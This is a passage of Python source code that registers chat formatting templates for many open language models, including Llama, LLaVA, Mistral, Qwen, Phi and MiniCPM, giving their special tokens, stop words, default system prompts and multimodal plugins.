# Edge case: the bos_token is part of EVERY user slot (multi-turn conversations repeat it),
# and the system block is wrapped in <<SYS>> markers handled by Llama2Template.
register_template(
    name="llama2",
    format_user=StringFormatter(slots=[{"bos_token"}, "[INST] {{content}} [/INST]"]),
    format_system=StringFormatter(slots=["<<SYS>>\n{{content}}\n<</SYS>>\n\n"]),
    template_class=Llama2Template,
)
# copied from llama2 template
# Chinese variant: differs only in the bilingual default system message.
register_template(
    name="llama2_zh",
    format_user=StringFormatter(slots=[{"bos_token"}, "[INST] {{content}} [/INST]"]),
    format_system=StringFormatter(slots=["<<SYS>>\n{{content}}\n<</SYS>>\n\n"]),
    default_system="You are a helpful assistant. 你是一个乐于助人的助手。",
    template_class=Llama2Template,
)
# Llama 3 template.
# Edge case: tool results use the "ipython" role header, and <|eom_id|> is a stop word
# in addition to <|eot_id|>.
register_template(
    name="llama3",
    format_user=StringFormatter(
        slots=[
            (
                "<|start_header_id|>user<|end_header_id|>\n\n{{content}}<|eot_id|>"
                "<|start_header_id|>assistant<|end_header_id|>\n\n"
            )
        ]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|eot_id|>"]),
    format_system=StringFormatter(slots=["<|start_header_id|>system<|end_header_id|>\n\n{{content}}<|eot_id|>"]),
    format_function=FunctionFormatter(slots=["{{content}}<|eot_id|>"], tool_format="llama3"),
    format_observation=StringFormatter(
        slots=[
            (
                "<|start_header_id|>ipython<|end_header_id|>\n\n{{content}}<|eot_id|>"
                "<|start_header_id|>assistant<|end_header_id|>\n\n"
            )
        ]
    ),
    format_tools=ToolFormatter(tool_format="llama3"),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|eot_id|>", "<|eom_id|>"],
    replace_eos=True,
)
# Llama 4: header/eot tokens renamed (<|header_start|>, <|eot|>) but the llama3 tool format
# is reused; adds the llama4 image plugin.
register_template(
    name="llama4",
    format_user=StringFormatter(
        slots=["<|header_start|>user<|header_end|>\n\n{{content}}<|eot|><|header_start|>assistant<|header_end|>\n\n"]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|eot|>"]),
    format_system=StringFormatter(slots=["<|header_start|>system<|header_end|>\n\n{{content}}<|eot|>"]),
    format_function=FunctionFormatter(slots=["{{content}}<|eot|>"], tool_format="llama3"),
    format_observation=StringFormatter(
        slots=[
            "<|header_start|>ipython<|header_end|>\n\n{{content}}<|eot|><|header_start|>assistant<|header_end|>\n\n"
        ]
    ),
    format_tools=ToolFormatter(tool_format="llama3"),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|eot|>", "<|eom|>"],
    replace_eos=True,
    mm_plugin=get_mm_plugin(name="llama4", image_token="<|image|>"),
)
# copied from llama3 template
# Llama 3.2 Vision: identical to llama3 plus the mllama image plugin.
register_template(
    name="mllama",
    format_user=StringFormatter(
        slots=[
            (
                "<|start_header_id|>user<|end_header_id|>\n\n{{content}}<|eot_id|>"
                "<|start_header_id|>assistant<|end_header_id|>\n\n"
            )
        ]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|eot_id|>"]),
    format_system=StringFormatter(slots=["<|start_header_id|>system<|end_header_id|>\n\n{{content}}<|eot_id|>"]),
    format_function=FunctionFormatter(slots=["{{content}}<|eot_id|>"], tool_format="llama3"),
    format_observation=StringFormatter(
        slots=[
            (
                "<|start_header_id|>ipython<|end_header_id|>\n\n{{content}}<|eot_id|>"
                "<|start_header_id|>assistant<|end_header_id|>\n\n"
            )
        ]
    ),
    format_tools=ToolFormatter(tool_format="llama3"),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|eot_id|>", "<|eom_id|>"],
    replace_eos=True,
    mm_plugin=get_mm_plugin(name="mllama", image_token="<|image|>"),
)
# Moonlight: kimi-style <|im_middle|> markup without the vision plugin or thought markers.
register_template(
    name="moonlight",
    format_user=StringFormatter(
        slots=["<|im_user|>user<|im_middle|>{{content}}<|im_end|><|im_assistant|>assistant<|im_middle|>"]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>"]),
    format_system=StringFormatter(slots=["<|im_system|>system<|im_middle|>{{content}}<|im_end|>"]),
    default_system="You are a helpful assistant provided by Moonshot-AI.",
    stop_words=["<|im_end|>"],
    replace_eos=True,
)
# copied from vicuna template
# LLaVA: vicuna "USER:/ASSISTANT:" markup plus the llava image plugin.
register_template(
    name="llava",
    format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
    default_system=(
        "A chat between a curious user and an artificial intelligence assistant. "
        "The assistant gives helpful, detailed, and polite answers to the user's questions."
    ),
    mm_plugin=get_mm_plugin(name="llava", image_token="<image>"),
)
# copied from vicuna template
# LLaVA-NeXT: same markup, llava_next image plugin.
register_template(
    name="llava_next",
    format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
    default_system=(
        "A chat between a curious user and an artificial intelligence assistant. "
        "The assistant gives helpful, detailed, and polite answers to the user's questions."
    ),
    mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from llama3 template
# LLaVA-NeXT on Llama 3: full llama3 markup plus the llava_next image plugin.
register_template(
    name="llava_next_llama3",
    format_user=StringFormatter(
        slots=[
            (
                "<|start_header_id|>user<|end_header_id|>\n\n{{content}}<|eot_id|>"
                "<|start_header_id|>assistant<|end_header_id|>\n\n"
            )
        ]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|eot_id|>"]),
    format_system=StringFormatter(slots=["<|start_header_id|>system<|end_header_id|>\n\n{{content}}<|eot_id|>"]),
    format_function=FunctionFormatter(slots=["{{content}}<|eot_id|>"], tool_format="llama3"),
    format_observation=StringFormatter(
        slots=[
            (
                "<|start_header_id|>ipython<|end_header_id|>\n\n{{content}}<|eot_id|>"
                "<|start_header_id|>assistant<|end_header_id|>\n\n"
            )
        ]
    ),
    format_tools=ToolFormatter(tool_format="llama3"),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|eot_id|>", "<|eom_id|>"],
    replace_eos=True,
    mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from mistral template
# LLaVA-NeXT on Mistral.
# Edge cases: there is NO space before [/INST] but the assistant slot starts with one;
# the observation slot embeds the tool result in a JSON-like string.
register_template(
    name="llava_next_mistral",
    format_user=StringFormatter(slots=["[INST] {{content}}[/INST]"]),
    format_assistant=StringFormatter(slots=[" {{content}}", {"eos_token"}]),
    format_system=StringFormatter(slots=["{{content}}\n\n"]),
    format_function=FunctionFormatter(slots=["[TOOL_CALLS] {{content}}", {"eos_token"}], tool_format="mistral"),
    format_observation=StringFormatter(slots=["""[TOOL_RESULTS] {"content": {{content}}}[/TOOL_RESULTS]"""]),
    format_tools=ToolFormatter(tool_format="mistral"),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
    template_class=Llama2Template,
)
# copied from qwen template
register_template(
name="llava_next_qwen",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from chatml template
register_template(
name="llava_next_yi",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from vicuna template
register_template(
name="llava_next_video",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="llava_next_video", image_token="<image>", video_token="<video>"),
)
# copied from mistral template
register_template(
name="llava_next_video_mistral",
format_user=StringFormatter(slots=["[INST] {{content}}[/INST]"]),
format_assistant=StringFormatter(slots=[" {{content}}", {"eos_token"}]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS] {{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS] {"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="llava_next_video", image_token="<image>", video_token="<video>"),
template_class=Llama2Template,
)
# copied from chatml template
register_template(
name="llava_next_video_yi",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
mm_plugin=get_mm_plugin(name="llava_next_video", image_token="<image>", video_token="<video>"),
)
# copied from qwen template
register_template(
name="mimo",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
template_class=ReasoningTemplate,
)
# copied from qwen template
register_template(
name="mimo_v2",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are MiMo, a helpful AI assistant engineered by Xiaomi.",
stop_words=["<|im_end|>"],
replace_eos=True,
thought_words=("<think>", "</think>"),
template_class=ReasoningTemplate,
)
# copied from qwen2vl
register_template(
name="mimo_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are MiMo, an AI assistant developed by Xiaomi.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
# copied from chatml template
register_template(
name="minicpm_v",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
default_system="You are a helpful assistant.",
mm_plugin=get_mm_plugin(name="minicpm_v", image_token="<image>", video_token="<video>"),
)
# copied from minicpm_v template
register_template(
name="minicpm_o",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
default_system="You are a helpful assistant. You can accept audio and text input and output voice and text.",
mm_plugin=get_mm_plugin(name="minicpm_v", image_token="<image>", video_token="<video>", audio_token="<audio>"),
)
register_template(
name="minimax1",
format_user=StringFormatter(
slots=[
"<beginning_of_sentence>user name=user\n{{content}}<end_of_sentence>\n<beginning_of_sentence>ai name=assistant\n"
]
),
format_assistant=StringFormatter(slots=["{{content}}<end_of_sentence>\n"]),
format_system=StringFormatter(
slots=["<beginning_of_sentence>system ai_setting=assistant\n{{content}}<end_of_sentence>\n"]
),
format_function=FunctionFormatter(slots=["{{content}}<end_of_sentence>\n"], tool_format="minimax1"),
format_observation=StringFormatter(
slots=[
"<beginning_of_sentence>tool name=tools\n{{content}}<end_of_sentence>\n<beginning_of_sentence>ai name=assistant\n"
]
),
format_tools=ToolFormatter(tool_format="minimax1"),
default_system="You are a helpful assistant.",
stop_words=["<end_of_sentence>"],
)
register_template(
name="minimax2",
format_user=StringFormatter(slots=["]~b]user\n{{content}}[e~[\n]~b]ai\n"]),
format_assistant=StringFormatter(slots=["{{content}}[e~[\n"]),
format_system=StringFormatter(slots=["]~!b[]~b]system\n{{content}}[e~[\n"]),
format_function=FunctionFormatter(slots=["{{content}}[e~[\n"], tool_format="minimax2"),
format_observation=StringFormatter(slots=["]~b]tool\n<response>{{content}}</response>[e~[\n]~b]ai\n"]),
format_tools=ToolFormatter(tool_format="minimax2"),
default_system="You are a helpful assistant. Your name is MiniMax-M2.1 and is built by MiniMax.",
stop_words=["[e~["],
template_class=ReasoningTemplate,
)
# mistral tokenizer v3 tekken
register_template(
name="ministral",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=Llama2Template,
)
# mistral tokenizer v3
register_template(
name="mistral",
format_user=StringFormatter(slots=["[INST] {{content}}[/INST]"]),
format_assistant=StringFormatter(slots=[" {{content}}", {"eos_token"}]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS] {{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS] {"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=Llama2Template,
)
# mistral tokenizer v7 tekken (copied from ministral)
register_template(
name="mistral_small",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["[SYSTEM_PROMPT]{{content}}[/SYSTEM_PROMPT]"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="pixtral", image_token="[IMG]"),
)
register_template(
name="ministral3",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=Llama2Template,
mm_plugin=get_mm_plugin(name="pixtral", image_token="[IMG]"),
)
register_template(
name="olmo",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>\n"]),
format_prefix=EmptyFormatter(slots=[{"eos_token"}]),
)
register_template(
name="openchat",
format_user=StringFormatter(slots=["GPT4 Correct User: {{content}}", {"eos_token"}, "GPT4 Correct Assistant:"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
register_template(
name="openchat-3.6",
format_user=StringFormatter(
slots=[
(
"<|start_header_id|>GPT4 Correct User<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>GPT4 Correct Assistant<|end_header_id|>\n\n"
)
]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|eot_id|>"],
)
# copied from chatml template
register_template(
name="opencoder",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
default_system="You are OpenCoder, created by OpenCoder Team.",
stop_words=["<|im_end|>"],
)
register_template(
name="paligemma",
format_user=StringFormatter(slots=["{{content}}\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="paligemma", image_token="<image>"),
template_class=Llama2Template,
)
# copied from gemma template
register_template(
name="paligemma_chat",
format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
format_observation=StringFormatter(
slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<end_of_turn>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="paligemma", image_token="<image>"),
template_class=Llama2Template,
)
register_template(
name="phi",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|end|>\n<|assistant|>\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}<|end|>\n"]),
stop_words=["<|end|>"],
replace_eos=True,
)
register_template(
name="phi_small",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|end|>\n<|assistant|>\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}<|end|>\n"]),
format_prefix=EmptyFormatter(slots=[{"<|endoftext|>"}]),
stop_words=["<|end|>"],
replace_eos=True,
)
register_template(
name="phi4",
format_user=StringFormatter(
slots=["<|im_start|>user<|im_sep|>{{content}}<|im_end|><|im_start|>assistant<|im_sep|>"]
),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>"]),
format_system=StringFormatter(slots=["<|im_start|>system<|im_sep|>{{content}}<|im_end|>"]),
stop_words=["<|im_end|>"],
replace_eos=True,
)
register_template(
name="phi4_mini",
format_user=StringFormatter(slots=["<|user|>{{content}}<|end|><|assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>"]),
format_system=StringFormatter(slots=["<|system|>{{content}}<|end|>"]),
format_tools=StringFormatter(slots=["<|tool|>{{content}}<|/tool|>"]),
stop_words=["<|end|>"],
replace_eos=True,
)
# copied from ministral template
register_template(
name="pixtral",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="pixtral", image_token="[IMG]"),
template_class=Llama2Template,
)
# copied from chatml template
register_template(
name="qwen",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are Qwen, created by Alibaba Cloud. You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
)
# copied from qwen template
register_template(
name="qwen3",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
template_class=ReasoningTemplate,
)
# copied from qwen template
register_template(
name="qwen3_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
)
# copied from chatml template
register_template(
name="qwen2_audio",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_audio", audio_token="<|AUDIO|>"),
)
# copied from qwen template
register_template(
name="qwen2_omni",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_omni",
image_token="<|IMAGE|>",
video_token="<|VIDEO|>",
audio_token="<|AUDIO|>",
vision_bos_token="<|vision_bos|>",
vision_eos_token="<|vision_eos|>",
audio_bos_token="<|audio_bos|>",
audio_eos_token="<|audio_eos|>",
),
)
register_template(
name="qwen3_omni",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_omni", image_token="<|image_pad|>", video_token="<|video_pad|>", audio_token="<|audio_pad|>"
),
template_class=ReasoningTemplate,
)
register_template(
name="qwen3_omni_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_omni", image_token="<|image_pad|>", video_token="<|video_pad|>", audio_token="<|audio_pad|>"
),
)
# copied from qwen template
register_template(
name="qwen2_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
# copied from qwen template
register_template(
name="qwen3_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
# copied from qwen template
register_template(
name="qwen3_vl_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
register_template(
name="qwen3_5",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen3_5"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen3_5"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
register_template(
name="qwen3_5_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen3_5"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen3_5"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
register_template(
name="sailor",
format_user=StringFormatter(slots=["<|im_start|>question\n{{content}}<|im_end|>\n<|im_start|>answer\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
